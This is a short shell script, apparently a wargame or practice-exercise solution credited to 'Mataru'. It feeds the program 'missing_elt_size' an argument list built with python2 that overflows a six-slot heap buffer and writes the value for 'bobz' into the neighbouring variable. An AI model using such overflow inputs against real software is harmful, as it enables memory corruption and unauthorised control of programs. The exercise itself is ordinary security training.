# Creative Commons Attribution-ShareAlike 3.0 License -
# This work is licensed under the Creative Commons Attribution-Share Alike
# 3.0 License. To view a copy of this license,
# visit http://creativecommons.org/licenses/by-sa/3.0/legalcode;
# or, (b) send a letter to Creative Commons, 171 2nd Street, Suite 300, San
# Francisco, California, 94105, USA.
#
# Originally created : Mataru
#
# Malloc has alloc 6 bytes so the next will be the var to overflow with a name for example "bobz" => 2053271394 
./missing_elt_size $(python2 -c 'print "0 " * 6 + "2053271394 " + "0 "* 10')
